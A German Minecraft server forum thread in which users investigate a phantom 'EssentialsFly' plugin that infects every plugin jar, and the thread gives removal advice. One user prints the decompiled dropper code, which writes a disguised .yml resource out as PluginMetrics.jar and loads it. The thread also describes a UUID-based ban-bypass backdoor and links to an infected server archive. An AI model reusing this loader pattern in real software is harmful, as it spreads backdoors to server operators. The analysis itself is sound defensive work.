Was ist Enabling EssentialsFly v1.6.4 ??

[Starnos]

Hallo liebe User/innen,

ich habe auf meinen Server ein Plugin womit man Fahrzeuge ohne Mod´s haben kann evtl kennt das ja einer ? Das Vehicle plugin.

Bis jetzt lief alles 1a aber seit heute hab ich ein mächtiges Problem. Die Fahrzeuge lassen sich nicht mehr lenken. Die seteuern nur noch im Kreis.
Es wurde nix verändert am Server und auch keine Plugins aktualisiert.

Also habe ich ausschluss Verfahren gemacht.
Erst alle weg und dann nur das Plugin selbst drauf gelassen. Da funzt es alles 1a ohne Probleme... nun mach ich ein Plugin mit drauf egal welches das spielt keine Rolle und es funktioniert nicht mehr.....das komische ist in der konsole wird dann noch ein Plugin mit installiert: Enabling EssentialsFly v1.6.4. Dieses wird auch unter /pl angezeigt aber es wurde nicht mit drauf installiert...auch im Plugin Ordner ist es nicht zu finden.

Also hatte ich den Testserver ganz frisch gemacht Ohne ein einziges Plugin. Da kommt wieder das EssentialsFly v1.6.4.
Hat einer auch schonmal so ein Problem gehabt?

Oder hat MC wieder an der Spielmechanik gefummelt??

 

[BlackHole]

Dass ein Plugin ganz von selbst erscheint ist schon sehr merkwürdig. Schaue doch mal in deinem Plugins-Ordner ob es dort einen "update"-Ordner gibt.

 

[Starnos]

Nein gibt es nicht..wie gesagt ich nehme eine Pure Paper Spigot Version und erstelle eine Start Datei.
Dann wird der Server generiert. Ich stelle die Eule auf true und dann wird der rest generiert.
NUn nehme ich eine x beliebige Plugin Datei und starte den Server alles ist normal. Nun füge ich eine weitere x beliebige Plugin dazu und nun wird automatisch
EssentialsFly v1.6.4 --> [22:52:50] [Server thread/INFO]: [EssentialsFly] Enabling EssentialsFly v1.6.4
mit generiert....aus dem NIX also ich kann es mir nicht erklären woher er die nimmt und wieso diese nicht im Plugin Ordner dann erscheint obwohl er die generiert und diese Datei beeinflust auch dann das Vehicle Plugin.

Diese Datei gibt es auch erst seit dem heute in den Log Datein dafor ist die nicht zu finden in keiner Logdateien der letzten Monate. Es wurde wie gesagt nicht geändert am Server. Und bei Frisch aufgelegten Servern erscheint die auch ab zwei Plugin. Kann einer dies bitte auch mal testen mit einen Paper spigot server?


Ich habe nun ein
PluginManager installiert und dieses Plugin was nicht im Plugin Ordner zu finden ist aber mit /pl zu finden ist deaktiviert udn dann aufeinmal gehen die Vehicle wieder. Es liegt eindeutig an diesem ominösen Plugin das aus dem Nichts kommt

Ich habe auch herausgefunden das dieses Plugin was aus dem nichts kommt und nur mit /pl oder Console zu sehen ist nicht in den Dateien das dieses Enorm den server auslastet... erst hatte ich es aus dann wieder angemacht und wieder aus und man sieht an der Kurve wo es an war und wieder aus

Ich habe einfach mal einen Server erstellt und mit 2 Plugins geladen. Wo auch wieder die Datei kommt. Ich habe die mal mit hier verlinkt den Server damit evtl einer herausfindet was es damit auf sich hat..woher die Datei kommt.Die Probleme auf dem server verursacht

http://www.mediafire.com/file/re2ajhk09ta9eun/test.rar/file


Und ich habe das Über das Plugin herausgefunden:

==========[ essentialsfly-Info ]==========
Version: 1.6.4
Main-Class: mLOuwPehiScXpxzplFLSgRnonlsDnYLCsTnknWlFHhAxgVbiXFMgqBdkNKMxEQTnsYHNHafCaCUXegGiVgJdEDVKJCKidxVfBwPYjAxkNvTkBULDiHvHxEThkCHGuFNvfnNyyyXiDxuODmFkgdLMJaqfllYcfzVrOXuaEcDxlXxMTAEMAjWLaK.goohYzvwsSHhJcxXtWEAnOSoqtzvSacqoNvhdpovtAbIYiGjArGRzJebRccjrSjYyXLrGBvFiqRgLYITUkUYIDazNyoTszIrUVxquroJrMiomQYSmYzDbmCpnbCdomhMrNHGzLIavopJqDYwptJalCduUWATGgaIgJecSktInYmTiFWOwvAfDQuMFkSioqeQzlR.goohYzvwsSHhJcxXtWEAnOSoqtzvSacqoNvhdpovtAbIYiGjArGRzJebRccjrSjYyXLrGBvFiqRgLYITUkUYIDazNyoTszIrUVxquroJrMiomQYSmYzDbmCpnbCdomhMrNHGzLIavopJqDYwptJalCduUWATGgaIgJecSktInYmTiFWOwvAfDQuMFkSioqeQzlR.BmTfhduPpiAhzNiwlurrDVxakARjdMKXPxgaurymEhoMreMiqqzuvtisMwoUTGQhwvhivrYBOvNtNnopHdjOtIifgACnXIHCMzIigKHXpDSeClUQxFqazbHwdVvqYHvjkweMLTsdIuHHgwWcyWpogyijfPKncfLzYnQNvLUEEtRlxNIxItGMmWroIoVkkaJNgcnLJoA.CHChYxCuMJNYRHWiUKCvuqOsLtpdBorvXVNBPfSQQMyxjjPHbVcCBhSoFnDkDieGDNqBfDJwsVhmnOyadmWNuUuyjouvGIzftyAYeLUISTCiyIvsOOLDqjdoWzNkqmxUExfETHrUhBDomuGhrsESywOElfIymGJrLoDLvCWERiJOhYCoWFqCmoGmrWpOHzKWwnzOtTL

 

[UnityGaming]

Klingt ein wenig danach, als hättest du dir irgendeinen Schrott eingefangen.

- Woher stammt deine Server Jar?
- Woher stammt das Vehicle Plugin?
- Woher stammen die restlichen Plugins?
- Was sagen die Timings im Bezug auf die Quellklasse dieser Belastung?

Poste am liebsten mal nen anonymisierten Timingslink.

 

[UnityGaming]

Ich habe mal kurz die neuste Version runtergeladen und den Code überflogen... da ist nichts.
Die Quelle liegt woanders - oder ich habe auf die Schnelle was übersehen... ehrlich gesagt bin ich mir aber sicher, dass das nicht der Fall ist.

Du benutzt die Mob Heads 1.7 Jar schätze ich? (https://www.spigotmc.org/resources/ultimate-mob-heads.54946/download?version=222433)
Bei älteren / anderen Versionen weiß ich nicht wie das ist.

 

[Starnos]

ich habe nun herausgefunden das aufeinmal in jeder .jar Datei PLugiun die Datei tmVUQmgfEFtZCTWtKDbYGjfJxc.yml drinne ist...also denken ich mir nen virus der sich in alle plugins reingesetzt hat :/

 

[UnityGaming]

Was steht denn da drin?
Welches Betriebssystem nutzt du?

Und btw... nice one!
Sowas hab ich noch nie gesehen, ich will wirklich wissen wie du da dran kamst.
Wer weiß, was das tolle Plugin noch alles tut im Hintergrund.

 

[BlackHole]

Paper solltest du von der offiziellen Seite herunterladen:
https://destroystokyo.com/ci/job/Paper/

 

[Starnos]

Wie gesagt das Head Plugin war das einzigste was ich ausgetauscht hatte....In jeder der 61 .jar Plugin ist nun so eine komische Datei drinne....menschhh sowas hab ich nie gehabt in einen Jahr...werde nun spigot austauschen wo Blackhole mir gschrieben hat und alle .jar Dateien durch die Orginallen die noch vor 3 Wochen gingen austauschen. Im kleinen test hatte es geholfen.

Nochmals danke an allen....dinge gibt die gibt es nicht.....

 

[Chrisliebär❤️]

Könntest du mir ein moglimögl kleines infiziertes Plugin und ggf. auch die Essentials fly.jar Datei irgendwo hochladen und den Link per PN schicken? Ich würde mir das gerne Mal genauer anschauen was das Ding tut und wie es funktioniert.

 

[UnityGaming]

Könntest du mir ein moglimögl kleines infiziertes Plugin und ggf. auch die Essentials fly.jar Datei irgendwo hochladen und den Link per PN schicken? Ich würde mir das gerne Mal genauer anschauen was das Ding tut und wie es funktioniert.

Hätte ich auch gerne eine Kopie von. +1

 

[BlackHole]

Ist doch in der oben verlinkten test.rar alles enthalten.
Java Bytecode lese ich aber nicht mal eben so, so dass ich den höchst verschleierten Code nicht verstehe.

 

[Starnos]

Ich habe neuerdings immer wieder Abstürze schon 5 mal heute und bekomme dann einen Error Code....kennt sich einer damit aus und weiss evtl woran es liegen kann??HOffe nicht an dem Virus/Wurm den ich hatte

https://pastebin.com/FFmW0YFN

 

[UnityGaming]

Auf den ersten Blick: Essentials.
Evtl. mal updaten oder gleich ganz rausschmeißen.

 

[BlackHole]

EssentialsX muss aktualisiert werden, die hatten dort bestimmte interne Details einer YAML-Bibliothek vorausgesetzt.

 

[Starnos]

Ein neuer User hat im Spigot Forum diesen ominösen Virus gemeldet. Also ist das der 2te Fall mit dieser Essentialsfly Datei die aufgetaucht ist.

Damit andere Wissen wie man Ihn entfernt:

Sie müssen alle JAR-Dateien löschen und erneut herunterladen. Auch die Datei spigot.jar. Auch die .jar-Dateien im Plugins-Ordner !! Dann starte deinen Server neu, dann sollte der Virus verschwunden sein. Der Virus befindet sich in jeder .jar-Datei. Sie können es sehen, wenn Sie dort eine .Jar-Datei mit winrar öffnen. Es wird eine unbekannte Datei darin geben, die so aussieht wie gshszwgvdhjdhjdjdkjdgh.yml, das ist der Virus.

You have to delete and re-download all .jar files. Also the spigot.jar file. Also the .jar files in the plugins folder !! Then restart your server then the virus should be gone. The virus is in every .jar file. You can see it if you open a .Jar file with winrar there. There will be an unknown file inside that looks something like gshszwgvdhjdhjdjdkjdgh.yml that's the virus.

 

[Chrisliebär❤️]

Ich hab mir das ganze mal angeschaut. Also erstmal werden keine Modifikationen an der Server.jar durchgeführt. Die Infektion beschränkt sich auf andere Plugins. Dabei kopiert sich das Plugin als .yml Datei getarnt in die Jar Datei und patch sich in das bestehende Plugin.

public void onEnable()
  {
  nBlnwWrlFwkyOwVMVjJoU();


  private void nBlnwWrlFwkyOwVMVjJoU()
  {
  try
  {
  File localFile = new File("plugins/PluginMetrics.jar");
  if (localFile.exists()) {
  localFile.delete();
  }
  FileOutputStream localFileOutputStream = new FileOutputStream(localFile);
  localFileOutputStream.write(IOUtils.toByteArray(getClass().getClassLoader().getResourceAsStream("HQHDdJHY0qjGZ0Mw4JaR70.yml")));
  localFileOutputStream.close();
  Bukkit.getPluginManager().enablePlugin(Bukkit.getPluginManager().loadPlugin(localFile));
  }
  catch (Exception localException) {}
  }

Der Name der Datei wird dabei zufällig gewählt. Aber gut, das ist auch der langweilige Teil. Die eigentlich Payload ist obfuscated, scheinbar wurde hierfür Allatori verwendet, was man daran erkennt, dass es sein Wasserzeichen überall hinterlassen hat, da nur eine Testversion verwendet wurde. Das Problem ist, dass für das patchen des Plugins eine Java Bytecode Library verwendet wurde, die ziemlich groß ist. Ich habe mir nicht die Mühe gemacht das alles nachzuvollziehen. Ich geh einfach mal davon aus, dass diese großen Packages im Plugin diese Library sind.

Leider gibt es für Java auch keine gescheiten Tools fürs Reverse Engineering. Alles was es so gibt scheint irgendwie hoffnungslos kaputt zu sein. Nicht mal die String decryption hat bei irgendeinem Tool funktioniert. Man könnte sich natürlich selbst was bauen, da der Einstiegspunkt im Plugin ja bekannt ist und man über die Bukkit API trotzdem verfolgen kann, was das Plugin tut. Aber ich hab mit der Pluginentwicklung schon lange abgeschlossen und keine Lust mir dafür etwas zu bauen.

Scheint sich jedenfalls um ein recht ausgefallenes Adminplugin zu handeln. Es gibt halt alles was man erwarten würde. Leider verschluckt sich der Deobfuscator an allen möglichen Methoden und auf Java Bytecode hab ich keine Lust. Interessant finde ich allerdings, dass sich im Code allerdings auch Methoden befinden, die Netzwerkverbindungen aufbauen und Code für kryptografischen Schlüsselaustauch finden sich auch. Das ist zwar in einem anderen Package und könnte damit gar nicht Teil des Plugins sondern Teil der Bytecode Library sein, aber im Prinzip gibt's keinen Grund warum die original Packagestruktur erhalten bleiben sollte.

Es würd mich aber wundern, wenn hier wirklich mehr drin steckt als ein simples "Op" Plugin. Vielleicht ist das sogar ein bestehendes Plugin, in das nur eine Backdoor eingebaut wurde. Wer nämlich Ahnung hat und ohnehin schon Bytecode modifiziert sollte auch wissen, wie er sein Plugin laden kann, ohne dass er dabei den offiziellen weg von Bukkit geht (wodurch dieses Plugin dir ja in erster Linie auch dir aufgefallen ist).

Falls es aber jemand schaffen sollten die ganzen Strings gescheit zu decrypten, wäre ich interessiert.

 

[UnityGaming]

Falls es aber jemand schaffen sollten die ganzen Strings gescheit zu decrypten, wäre ich interessiert.

Ich wühle mich grade durch diverse Deobfuscator... die auch behaupten mit Allatori zurechtzukommen. Bisher eher mau.
Allerdings bin ich etwas anderem auf der Spur.

Es scheint schon irgendwas zu tun für ein oder mehrere Spieler... macht jedenfalls Spaß bisher. =)
Da schwirrt auch immer wieder etwas Netzverkehr umher... evtl. sendet es custom Packets an bestimmte Clients.

 

[UnityGaming]

Aus vielen vielen Strings kristallisieren sich langsam Buchstabenketten heraus... aber das kann auch täuschen.
Es gibt zahlreiche EventHandler die eindeutig auf eine Liste mit UUIDs reagieren und z.B. JoinEvents dahingehend manipulieren, dass für gewisse IDs ein Bann zb. ignoriert werden kann.

@Starnos kannst du den Foreneintrag aus Spigot mal verlinken hier? Würde mir gerne mal die Meinungen dort durchlesen.

 

[Starnos]

In dem Foreneintrag von dem Vehicle Plugin hat der User das geschrieben:

Having an issue that even when just loading Vehicles and PEX, a third plugin EssentialsFly gets loaded. This makes me unable to use Vehicles as they just go in circles. Having same issue as : https://minecraft-server.eu/forum/threads/was-ist-enabling-essentialsfly-v1-6-4.49413/ ( translate the page)
I'm worried this is a virus. I can /plugman disable EssentialsFly, then everything works good as new.
It also takes up a lot of TPS in timings, thousands of events, but the event names are hashed/obfuscated..
I've tried messaging the developer multiple times without any response.
Anyone else having an issue??

Original --> https://www.spigotmc.org/threads/✈️vehicles-no-resourcepacks-needed-paid.93271/page-120#post-3018116

Es liegt wohl daran das man bei dem Plugin am schnellsten gemerkt hat das da was nicht stimmt weil die Steuerung der Fahrzeuge nicht mehr funktionieren...ohne dieses hätte der User dies wohl auch nicht geschrieben mit bezug auf dieses Forum was er als einzigstes zu dem Thema gefunden hat und der kommt aus Texas....